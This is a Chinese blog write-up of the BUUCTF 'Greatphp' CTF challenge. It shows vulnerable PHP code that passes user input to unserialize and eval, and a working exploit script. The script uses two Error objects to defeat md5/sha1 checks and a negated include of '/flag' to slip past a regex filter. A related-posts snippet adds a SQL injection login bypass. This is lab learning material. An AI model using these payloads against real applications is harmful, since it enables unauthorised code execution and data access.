BUUCTF--[极客大挑战 2020]Greatphp

最新推荐文章于 2024-09-02 10:55:23 发布
最新推荐文章于 2024-09-02 10:55:23 发布
阅读量1.3k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119613766
本文探讨了一段PHP代码中涉及的反序列化漏洞,通过Error类的__toString方法绕过md5和sha1校验,并利用preg_match过滤特性,成功触发eval执行。博主分享了一个利用内置类Error构造不同对象但字符串表示相同的技巧,从而实现对flag文件的包含。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入页面后可以看到给出的代码

<?php
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
           
        }
    }
}

if (isset($_GET['great'])){
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

?>

看到unserialize就很容易猜到这里考察的是反序列化漏洞

用Error类绕过md5和sha1检测

 Error类中有__tostring方法,md5()和sha1()函数都会调用__tostring()

test:
<?php
$a = new Error("payload",1);
$b = new Error("payload",2);
echo $a;
echo "<br>";
echo $b;
echo "<br>";
if($a != $b)
{
	echo "a!=b";
}
echo "<br>";
if(md5($a) === md5($b))
{
	echo "md5相等"."<br>";
}
if(sha1($a)=== sha1($b)){
    echo "sha1相等";
}

结果:
a!=b
md5相等
sha1相等
  • 我们可以将题目代码中的 $syc 和 $lover 分别声明为类似上面的内置类的对象,让这两个对象本身不同(传入的错误代码即可),但是 __toString 方法输出的结果相同即可
  • 由于题目用preg_match过滤了小括号无法调用函数,所以我们尝试直接 include "/flag" 将flag包含进来即可;由于过滤了引号,我们直接用url取反绕过即可

借用大佬的脚本

  <?php
class SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
		   if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
			   eval($this->syc);
		   } else {
			   die("Try Hard !!");
		   }
		   
		}
	}
}
$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";
$a=new Error($str,1);$b=new Error($str,2);
$c = new SYCLOVER();
$c->syc = $a;
$c->lover = $b;
echo(urlencode(serialize($c)));

?>
Uzero.
关注
[极客挑战 2020]Greatphp
snowlyzz的博客
09-15 702
php 原生类的学习与姿势利用,
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 858
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2020]Greatphp (php 内置类)
qq_62046696的博客
12-20 1521
闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。PHP7中,可以在echo时触发__toString,来构造XSS。
[极客挑战 2020]Greatphp 原生类绕过
qq_54929891的博客
05-10 1176
<?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== s.
2024年最新Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
2401_84302369的博客
05-01 686
此时跳转到check.php页面,得到结果。可知此页面与数据库产生交互。
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 990
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
buuctf-web(极客挑战2019)
qq_47804678的博客
02-08 413
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
BUUCTF | Web [极客挑战 2019]EasySQL-- BUUOJ WriteUP
zxsctf的博客
07-15 486
测试的时候输入了1’and‘1’=1这个有问题的payload,看报错信息中带有一个andpassword=‘1’and‘1’=1说明sql语句是SELECT*FROMtablesWHEREusername=‘1’and‘1’=1andpassword=‘1’and‘1’=1类似这样的查询,and的两边同时为TRUE结果才能为TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。我们要从最简单的题目开始做起,一点一点的培养我们的网络安全技术。...
[极客挑战 2020]Greatphp1
alwtj的博客
09-02 1712
所以,我们可以通过PHP的原生类来进行绕过(Error 或者 Exception),这两个类中呢存在一个_toString()的方法属性,意思就是当这两个类的对面需要被转换成字符串的时候就会调用 _toString()函数,下半部分就是传入一个great的参数,对这个参数进行反序列化,所以我们目标就明确了,我们需要绕过这个强类型比较,之后在绕过正则表达,最后执行寻找flag的命令.php 来实现我们包含flag文件的效果,又因为正则表达过滤了php我们可以用
极客挑战php,buucitf-[极客挑战 2020]Roamphp1-Welcome
weixin_36280317的博客
03-22 290
打开靶机,发现什么也没有,因为极客挑战有hint.txt,里面说尝试换一种请求的方式,bp抓包,然后发送了POST请求,出现了下面的界面这个还是挺简单的,因为是极客挑战上的第一波题,关键是这个如果不是用POST请求,就会出现类似报错的信息。紧接着就是isset这个很好绕过,我们要传参,这个肯定到了else if判断,如果进入这个循环,我们就可以拿到这个站的phpinfo()信息,POST传两个...
BUUCTF--[WMCTF2020]Make PHP Great Again 2.0
qq_46263951的博客
08-18 777
进入页面给出代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行 发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。 /proc/sel..
BUUCTF--[极客挑战 2020]Roamphp1-Welcome
qq_46263951的博客
07-29 433
进入页面后一片空白,查看源码也啥也没有,蒙蔽中... 看佬wp说有提示,直接改为post请求即可查看到一段代码 根据源码中的提示,如果我们想要获取更多的信息就要使下面的语句成立 if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ 若想成立非常简单,因为sha1函数无法处理数组,所以令两个变量都为数组则得出的结果为false===false值为..
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1541
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
极客挑战2020年部分wp
qq_46041723的博客
11-17 1800
2020极客挑战部分wp前言web一、朋友的学妹二、EZWWW三、刘壮的黑页四、welcome 前言 2020极客挑战开始了。又是一届自闭季。在变菜的路上一去不复返 web 一、朋友的学妹 打开题目 发现提示,然后查看控制窗口发现 然后看到base64加密,解密后得到flag。 二、EZWWW 打开题目 发现提示网站已经备份,那么就直接御剑扫后台得到 然后打开zip路径得到下载提示,打开 直接放弃文档里的flag。肯定假的。所以打开index.php,发现 <html> <hea
[BUUCTF0223][极客挑战 2020]Roamphp1-Welcome
m0_52674595的博客
12-24 536
[BUUCTF0223] [极客挑战 2020]Roamphp1-Welcome 打开靶机 什么都没 查看源码 什么也没有 猜想不是用GET请求 尝试用POST请求 使用火狐的插件:RESTClient 使用POST请求 查看预览 看到要求 $_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'] 即roam1与roam2不能相等 再看sha1()函数 查看得知sha1()
BUUCTF [极客挑战 2020] Roamphp1-Welcome
Senimo
12-21 1478
BUUCTF [极客挑战 2020] Roamphp1-Welcome 考点: POST传参方式 sha1()不能加密数组 启动题目: 等了一阵子,一直是这样,查阅其他wp得知,原题中提示有:换一种请求方式 使用BurpSuite抓去数据包: 将传参方式修改为POST,发送数据包,得到题目源码: error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allow
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
最新发布
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值